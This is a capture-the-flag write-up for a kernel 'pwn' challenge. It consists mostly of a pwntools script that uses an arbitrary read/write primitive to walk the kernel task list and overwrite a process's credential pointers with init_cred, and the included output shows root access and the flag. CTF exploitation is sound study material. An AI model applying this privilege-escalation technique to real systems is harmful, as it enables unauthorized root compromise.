Tags: pwn kernel
Rating: 1.0
[@javierprtd](https://twitter.com/javierprtd)
```
# -*- coding:utf-8 -*-
from pwn import *
IOCTL_READ = 901
IOCTL_WRITE = 902
OFFSET_COMM = 0x408
OFFSET_TASKS = 0x210
e = ELF('./vmlinux')
def menu(n):
io.recvuntil("> ")
io.sendline(str(n))
def read(p):
menu(1)
io.recvuntil(">")
io.sendline('{:02x}'.format(p));
io.recvuntil("Got everything I need. Let's do it!")
io.recvuntil("We're back. Our scouter says the power level is: ")
return int(io.recv(16).ljust(16, '\0'), 16)
def write(p, v):
menu(2)
io.recvuntil(">")
io.sendline('{:02x}'.format(p))
io.recvuntil(">")
io.sendline('{:02x}'.format(v))
def show_id():
menu(3)
print io.recvline() + io.recvline()
def read_file(name):
menu(4)
io.recvuntil(">")
io.sendline(name)
print io.recvline() + io.recvline() + io.recvline()
def exit():
menu(6)
io = remote("babykernel2.forfuture.fluxfingers.net", 1337)
init_task = e.sym['init_task']
init_cred = e.sym['init_cred']
print "[+] init_task: 0x%08x" % init_task
print "[+] init_cred: 0x%08x" % init_cred
comm = ""
task = 0;
ptask = init_task;
while task != init_task:
task = read(ptask + OFFSET_TASKS) - OFFSET_TASKS;
comm = read(task + OFFSET_COMM);
process = '{:02x}'.format(comm).decode("hex")[::-1]
print "[+] 0x%08x -> %s" % (task, process)
if "client_k" in process:
break
ptask = task
write(task + OFFSET_COMM - 8 , init_cred)
write(task + OFFSET_COMM - 16, init_cred)
io.interactive()
'''
[+] Opening connection to babykernel2.forfuture.fluxfingers.net on port 1337: Done
[+] init_task: 0xffffffff8181b4c0
[+] init_cred: 0xffffffff8183f4c0
[+] 0xffff888000028000 -> init\x00er
[+] 0xffff888000029180 -> kthreadd
[+] 0xffff88800002a300 -> rcu_gp\x00d
[+] 0xffff88800002b480 -> rcu_par_
[+] 0xffff88800002c600 -> kworker/
[+] 0xffff88800002d780 -> kworker/
[+] 0xffff88800002e900 -> kworker/
[+] 0xffff888000058000 -> mm_percp
[+] 0xffff888000059180 -> ksoftirq
[+] 0xffff88800005a300 -> rcu_pree
[+] 0xffff88800005b480 -> rcu_sche
[+] 0xffff88800005c600 -> rcu_bh\x00d
[+] 0xffff88800005d780 -> kdevtmpf
[+] 0xffff88800005e900 -> rcu_task
[+] 0xffff888000118000 -> kworker/
[+] 0xffff888000119180 -> oom_reap
[+] 0xffff88800011a300 -> writebac
[+] 0xffff88800011b480 -> kswapd0
[+] 0xffff88800011c600 -> acpi_the
[+] 0xffff88800011d780 -> kworker/
[+] 0xffff88800011e900 -> kworker/
[+] 0xffff888003373480 -> sh\x00t\x00er
[+] 0xffff888003371180 -> client_k
[*] Switching to interactive mode
ffffffff8183f4c0
Thanks, boss. I can't believe we're doing this!
Amazingly, we're back again.
----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> $ 3
3
uid=0(root) gid=0(root)
----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> $ 4
4
Which file are we trying to read?
> $ /flag
/flag
Here are your 0x35 bytes contents:
flag{nicely_done_this_is_how_a_privesc_can_also_go}
'''
```
